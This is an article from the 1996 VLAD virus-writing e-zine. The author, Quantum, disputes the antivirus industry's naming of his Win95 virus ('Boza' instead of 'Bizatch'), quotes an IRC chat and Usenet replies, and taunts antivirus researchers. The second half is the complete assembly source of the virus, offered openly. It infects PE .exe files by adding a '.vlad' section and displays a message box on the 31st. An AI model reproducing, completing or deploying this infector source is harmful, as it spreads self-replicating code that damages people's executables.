The Boza Situation by Quantum / VLAD
------------------------------------
On the 29th of January 1996 I was directed to an article at
http://www.sophos.com about the "world's first win95 virus". Although
the article stated that the virus was written in Australia - it did not
state by whom the virus was written, and even though vlad was mentioned
(the new object created by Bizatch is ".vlad") it does not actually
state we wrote it.
While I was investigating the appearance, I had this conversation with the
#antivirus moderator, Hermanni:
-----------------------------------------------------------------------------
-> *hermanni* you conscious ?
yeah.
-> *hermanni* I dont know you.. and I doubt you know me.. but I hear you are
rather well known in the AV community
*Hermanni* no, i don't think i know you.
-> *hermanni* neways.. do you happen to know a guy by the name of Paul
Ducklin ? AVer with a group called Sophos.. ?
*Hermanni* yes, i know paul. duck@sophos.com
-> *hermanni* ok.. he has written an article and had it placed on the sophos
www site.. it is about the worlds first win95 virus..
-> *hermanni* I wrote this virus and I have mailed him at that address to
tell him this and I have gotten no reply -> *hermanni* you see.. he has
plucked a name for the virus out of the air he calls it "boza" .. even
tho there are massive ascii strings in it clearly stating that the virus
is called "bizatch"
-> *hermanni* eg Please note: the name of this virus is [Bizatch] written by
Quantum of VLAD
-> *hermanni* rather annoying..
*Hermanni* yes, we're calling to 'Boza' as well. it's a good name.
-> *hermanni* it's NOT a good name.. where did you get "boza" from ?!!?
*Hermanni* well, we called it _3192 for some time, then somebody thought
'Boza' would be more descriptive.
*Hermanni* i believe solomon and mcafee are calling it Boza as well.
-> *hermanni* calling it boza is not in your best interests.. paul ducklin is
-> *hermanni* going to look rather silly when vlad 6 comes out and it is
-> *hermanni* painfully obvious that the name was made up and the true name
-> *hermanni* was in the middle of the virus.. did you all even look for
-> *hermanni* strings ?
*Hermanni* hey, the name has already been decided.
*Hermanni* too late to complain, i'm afraid.
*Hermanni* do you have any idea how painful it is to get all the antivirus
venders to change a name of a virus?
-> *hermanni* no.. the name was chosen when I wrote the virus.. the name was
choosen when it escaped from our test systems and spread to every fewl who
copies win95 executables..
-> *hermanni* are you aware of how annoying it is to sit and choose a virus
name only to have it ignored by AV "researchers" ?
too bad, i gotta go
chat with you another time.
bye
fine.. perhaps Virus Bulletin Magazine will do a better job
and if they do.. on your square head be it
*** QuantumG has left channel #antivirus
-----------------------------------------------------------------------------
Generally, I think anti-virus authors need to adopt a much more professional
attitude.
Contrary to Paul Ducklin's claims, he (and Sophos) were not the first
antivirus company to discover this virus. It seems that AVP was the
first to "discover" it:
-----------------------------------------------------------------------------
Win95.Boza
It is not a dangerous parasitic NewEXE(PE)-virus. It searches for
EXE-files, checks the files for PE signature, then creates in
EXE-file new section named ".vlad", and writes its code into that
section.
While infecting that virus uses calls to functions GetDir, SetDir,
FindFirst, FindNext, OpenFile, LSeek, Read, Write, and CloseFile.
First, it gets the current directory, and checks the Windows95
kernel for some specific code. Then the virus searches for
.EXE-files, and checks them for PE signature. Then the virus
increases NumberOfSections field in PE-header, writes into the file
new Section Header that describes new Section in the file, and
writes itself to the end of the file.
While executing the virus infects up to 3 files, and looks for
.EXE-files in parent directories, if there are no more .EXE-files in
the current one. Before return to the host program the virus
restores the current directory.
The virus checks some data (the system date?) and in some cases
displays the messages:
Bizatch by Quantum / VLAD
The taste of fame just got tastier!
VLAD Australia does it again with the world's first Win95 Virus
From the old school to the new..
Metabolis
Qark
Darkman
Automag
Antigen
RhinceWind
Quantum
Absolute Overlord
CoKe
The virus also contains the internal text strings:
.vlad
Please note: the name of this virus is [Bizatch] written by Quantum of VLAD
The virus is not bugs-free, and in some cases Windows95 displays the
error message while executing of infected EXE-files.
-----------------------------------------------------------------------------
The claim of bugs in the virus are not without reason. There ARE bugs
in the "Boza" virus. As stated - Boza is a beta of Bizatch. The bugs
are fixed in the final release (thus the word beta!).
(Quantum made a slight error here in the first release of vlad#6,
on behalf of him, I'd like to apologise to Sara Gordon. In the
future he will make sure he confirms any information he receives.)
Looking through the alt.comp.virus news area, Metabolis came across a posting
by Vesselin Bontchev. He has replied to it and I will include that reply
here:
-----------------------------------------------------------------------------
>> This morning on local news programs they are reporting (from the UK)
>> discovery of a virus out of Bulgaria called the BOZA virus, which
>> purportedly infects only Windows 95 systems, plus some related executable
>> files, and displays a message...anyone heard of this or is this just
>> another "chicken little" story...
> The story is rather funny, folks. Here are some "insider" details.
> First, the main thing in the story is right - the first Win95-specific
> virus (or, more exactly, the first PE-EXE infector) has been found.
> The rest is... well... a news report.
> The virus is written by the Australian virus writing group VLAD. It
> was intended to be published in the next issue of their virus writing
> electronic newsletter. However, they were obviously so proud with what
> they have done, that they didn't have the patience to wait for the
> official release of the newsletter and "leaked" the virus to the
> anti-virus people. After all, the "avers" know more than anyone else
> about viruses, so they should be the most able to appreciate the new
> "achievement".
What you anti virus people have, is a beta of our virus. We gave it to
a couple of people to test for us, and all of a sudden you guys seem to
have the source. Leaking source to you would be the last thing I'd do.
> I first heard about this virus from a contact of mine in Germany - but
> didn't get a sample. (And didn't insist one one, BTW. Big deal, a
> PE-EXE infector. When it appears, we'll see it.) A few days ago we
> (CARO) got a sample sent to us by one of our members - Eugene
> Kaspersky; the author of AVP. Another CARO member works for the
> British anti-virus company Sophos. Obviously, Sophos have decided that
> the virus is worth making a noise about it in the media and has
> published a press release - which then has been copied and interpreted
> freely by the major media agencies.
Indeed, yet another media scare which will make you anti virus people a
lot of money, I mean come on.. stop complaining. We line your pockets.
> I, personally, think that the virus is not worth the noise. C'mon,
> folks, it is just a silly non-resident EXE-only infector, which works
> only in 32-bibt environments using the PE-EXE format (like Win95,
> WfW+WinG, or WinNT). FYI, "PE" stands for "Portable Executable". Such
> programs are supposed to be able to run in all the three environments
> mentioned above. On the top of that, the virus is buggy as hell -
> infected files sometimes become megabytes long. In short, it has
> virtually zero chances to spread and become a threat. On the top of
> that, the media quoted Sophos as "one British company", so they didn't
> get even advertising value from their press release. And it was
> certainly not them who discovered the virus.
Well gee, I wonder why the virus is buggy.. it's a beta!! Not supposed
to be released. You'll have to wait for the magazine to get the full
release. As for it being silly, well.. do you see any others around? We
had to start somewhere..
> Now, about the virus name. That's the finniest part of the story. The
> virus contains several text strings, among which the phrase "Please
> note: the name of this virus is [Bizatch] written by Quantum of VLAD".
> It seemed that the virus writer who goes under the handle "Quantum"
> *very* much wanted to have "his" virus named "Bizatch". Well, we're
> not in the business of satisfying the virus writers' need for fame, so
> we (CARO) decided to name the virus differently, just inspite. :-)
Do you guys have anything better to be doing other than spiting virus
authors?
> But how to name it? Some trivial name was proposed - like V32 (for
> 32-bit virus), but that looked too generic to me. Then I had an
> inspiration! The wannabe name of the virus sounded a bit like the
> [ABulgarian word "boza". In Bulgarian (and probably in Turkish), this
> word means a drink made of millit (and, as the rumour goes, of candies
> that have spoiled), which is semi-liquid and tends to ferment quickly
> (has to be consumed within 48 hours, or it gets spoiled) and has about
> 0.5% alcohol. It is something I call "the undrinkable Bulgarian
> drink", because most foreigners find it of horrible taste and tend to
> throw up after drinking it - while I (and many Bulgarians) find it
> delicious. :-) The drink has a light-brown color, is semi-liquid and
> looks like - yes, you guessed it.
> Furthermore, there is a Bulgarian slang expression "this is a complete
> 'boza'", meaning that something is totally messed-up/screwed-up (it's
> used only for things; not for situations). This is the expression a
> Bulgarian would use when faced with spagetti code or an incredibly
> buggy program. (Right, Windoze is a complete 'boza' too.) Since the
> virus in question is rather buggy, since there is at least one
> Bulgarian virus writer in Australia (going by the handle "Levski"),
> and since the term has a slightly offensive meaning when applied to a
> program, I thought that it would be a perfect name for this particular
> virus. Well, so it stuck. (The 'boza' is a sticky drink too.) :-)
Levski would like to code a virus I'm sure, but at this moment in time
writing anything in asm would be an impossibility. Mainly because he
isn't a coder. Next time you want to accuse someone of something, get
your facts straight first.
> So, to summarize, yes, the Boza virus really exists, yes, it displays
> a message in a window praising its creators, and no, it is not any
> serious threat. As usual, you can ignore almost everything the media
> says about computer viruses. It's real but it's not the end of the
> world, folks. Just yet another stupid virus out there - one which
> (thank goodness) has no chances to spread.
Smuch mi kura.. kogato razbirash kakvoto prikazvash togava el pri men i
mi kaji nechto. Do togava, pqlni si jobovete s pari or kakvoto nie
pravime i jiveeme za. Ebi se.
Metabolis.
-----------------------------------------------------------------------------
Bontchev, as of most AVers, has a high opinion of himself. Giving a virus
multiple names will only confuse people who have the misfortune of coming
in contact with it. Whoever released this beta of a virus into the wild
was very irresponsible - what's worse is they humiliated me in front of the
VX and AV community. You have gained yourself at least one enemy.
Here is the beta of Bizatch (the actual virus code) that AV authors
around the world are calling "Boza".
-----------------------------------------------------------------------------
vladseg segment para public 'vlad'
assume cs:vladseg
vstart:
call recalc
recalc:
pop ebp
mov eax,ebp
db 2dh
subme dd 30000h + (recalc - vstart)
push eax
sub ebp,offset recalc
mov eax,[ebp + offset kern2]
cmp dword ptr [eax],5350fc9ch
jnz notkern2
mov eax,[ebp + offset kern2]
jmp movit
notkern2:
mov eax,[ebp + offset kern1]
cmp dword ptr [eax],5350fc9ch
jnz nopayload
mov eax,[ebp + offset kern1]
movit:
mov [ebp + offset kern],eax
cld
lea eax,[ebp + offset orgdir]
push eax
push 255
call GetCurDir
mov byte ptr [ebp + offset countinfect],0
infectdir:
lea eax,[ebp + offset win32_data_thang]
push eax
lea eax,[ebp + offset fname]
push eax
call FindFile
mov dword ptr [ebp + offset searchhandle],eax
cmp eax,-1
jz foundnothing
gofile:
push 0
push dword ptr [ebp + offset fileattr]
push 3
push 0
push 0
push 80000000h + 40000000h
lea eax,[ebp + offset fullname]
push eax
call CreateFile
mov dword ptr [ebp + offset ahand],eax
cmp eax,-1
jz findnextone
push 0
push 0
push 3ch
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push 4
lea eax,[ebp + offset peheaderoffset]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile
push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push 58h
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile
cmp word ptr [ebp + offset peheader],'EP'
jnz notape
cmp word ptr [ebp + offset peheader + 4ch],0F00Dh
jz notape
push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push dword ptr [ebp + offset headersize]
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call ReadFile
mov word ptr [ebp + offset peheader + 4ch],0F00Dh
xor eax,eax
mov ax, word ptr [ebp + offset NtHeaderSize]
add eax,18h
mov dword ptr [ebp + offset ObjectTableoffset],eax
mov esi,dword ptr [ebp + offset ObjectTableoffset]
lea eax,[ebp + offset peheader]
add esi,eax
xor eax,eax
mov ax,[ebp + offset numObj]
mov ecx,40
xor edx,edx
mul ecx
add esi,eax
inc word ptr [ebp + offset numObj] ; inc the number of objects
lea edi,[ebp + offset newobject]
xchg edi,esi
mov eax,[edi-5*8+8]
add eax,[edi-5*8+12]
mov ecx,dword ptr [ebp + offset objalign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset RVA],eax
mov ecx,dword ptr [ebp + offset filealign]
mov eax,vend-vstart
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset physicalsize],eax
mov ecx,dword ptr [ebp + offset objalign]
mov eax,vend - vstart + 1000h
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset virtualsize],eax
mov eax,[edi-5*8+20]
add eax,[edi-5*8+16]
mov ecx,dword ptr [ebp + offset filealign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset physicaloffset],eax
mov eax,vend-vstart+1000h
add eax,dword ptr [ebp + offset imagesize]
mov ecx,[ebp + offset objalign]
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp + offset imagesize],eax
mov ecx,10
rep movsd
mov eax,dword ptr [ebp + offset RVA]
mov ebx,dword ptr [ebp + offset entrypointRVA]
mov dword ptr [ebp + offset entrypointRVA],eax
sub eax,ebx
add eax,5
mov dword ptr [ebp + offset subme],eax
push 0
push 0
push dword ptr [ebp + offset peheaderoffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push dword ptr [ebp + offset headersize]
lea eax,[ebp + offset peheader]
push eax
push dword ptr [ebp + offset ahand]
call WriteFile
inc byte ptr [ebp + offset countinfect]
push 0
push 0
push dword ptr [ebp + offset physicaloffset]
push dword ptr [ebp + offset ahand]
call SetFilePointer
push 0
lea eax,[ebp + offset bytesread]
push eax
push vend-vstart
lea eax,[ebp + offset vstart]
push eax
push dword ptr [ebp + offset ahand]
call WriteFile
notape:
push dword ptr [ebp + offset ahand]
call CloseFile
findnextone:
cmp byte ptr [ebp + offset countinfect],3
jz outty
lea eax,[ebp + offset win32_data_thang]
push eax
push dword ptr [ebp + offset searchhandle]
call FindNext
or eax,eax
jnz gofile
foundnothing:
xor eax,eax
lea edi,[ebp + offset tempdir]
mov ecx,256/4
rep stosd
lea edi,[ebp + offset tempdir1]
mov ecx,256/4
rep stosd
lea esi,[ebp + offset tempdir]
push esi
push 255
call GetCurDir
lea eax,[ebp + offset dotdot]
push eax
call SetCurDir
lea edi,[ebp + offset tempdir1]
push edi
push 255
call GetCurDir
mov ecx,256/4
rep cmpsd
jnz infectdir
outty:
lea eax,[ebp + offset orgdir]
push eax
call SetCurDir
lea eax,[ebp + offset systimestruct]
push eax
call GetTime
cmp word ptr [ebp + offset day],31
jnz nopayload
push 1000h
lea eax,[ebp + offset boxtitle]
push eax
lea eax,[ebp + offset boxmsg]
push eax
push 0
call MsgBox
nopayload:
pop eax
jmp eax
kern dd 0BFF93B95h
kern1 dd 0BFF93B95h
kern2 dd 0BFF93C1Dh
GetCurDir:
push 0BFF77744h
jmp [ebp + offset kern]
SetCurDir:
push 0BFF7771Dh
jmp [ebp + offset kern]
GetTime:
cmp [ebp + offset kern],0BFF93B95h
jnz gettimekern2
push 0BFF9D0B6h
jmp [ebp + offset kern]
gettimekern2:
push 0BFF9D14eh
jmp [ebp + offset kern]
MsgBox:
push 0BFF638D9h
jmp [ebp + offset kern]
FindFile:
push 0BFF77893h
jmp [ebp + offset kern]
FindNext:
push 0BFF778CBh
jmp [ebp + offset kern]
CreateFile:
push 0BFF77817h
jmp [ebp + offset kern]
SetFilePointer:
push 0BFF76FA0h
jmp [ebp + offset kern]
ReadFile:
push 0BFF75806h
jmp [ebp + offset kern]
WriteFile:
push 0BFF7580Dh
jmp [ebp + offset kern]
CloseFile:
push 0BFF7BC72h
jmp [ebp + offset kern]
countinfect db 0
win32_data_thang:
fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv dd 0,0
fullname db 256 dup (0)
realname db 14 dup (0)
boxtitle db "Bizatch by Quantum / VLAD",0
boxmsg db "The taste of fame just got tastier!",0dh
db "VLAD Australia does it again with the world's first Win95 Virus"
db 0dh,0dh
db 9,"From the old school to the new.. ",0dh,0dh
db 9,"Metabolis",0dh
db 9,"Qark",0dh
db 9,"Darkman",0dh
db 9,"Automag",0dh
db 9,"Antigen",0dh
db 9,"RhinceWind",0dh
db 9,"Quantum",0dh
db 9,"Absolute Overlord",0dh
db 9,"CoKe",0
message db "Please note: the name of this virus is [Bizatch]"
db " written by Quantum of VLAD",0
orgdir db 256 dup (0)
tempdir db 256 dup (0)
tempdir1 db 256 dup (0)
dotdot db "..",0
systimestruct:
dw 0,0,0
day dw 0
dw 0,0,0,0
searchhandle dd 0
fname db '*.exe',0
ahand dd 0
peheaderoffset dd 0
ObjectTableoffset dd 0
bytesread dd 0
newobject:
oname db ".vlad",0,0,0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reserved dd 0,0,0
objectflags db 40h,0,0,0c0h
peheader:
signature dd 0
cputype dw 0
numObj dw 0
db 3*4 dup (0)
NtHeaderSize dw 0
Flags dw 0
db 4*4 dup (0)
entrypointRVA dd 0
db 3*4 dup (0)
objalign dd 0
filealign dd 0
db 4*4 dup (0)
imagesize dd 0
headersize dd 0
vend:
db 1000h dup (0)
ends
end vstart
;------------------------------------------------------------------------------
- VLAD #6 INDEX -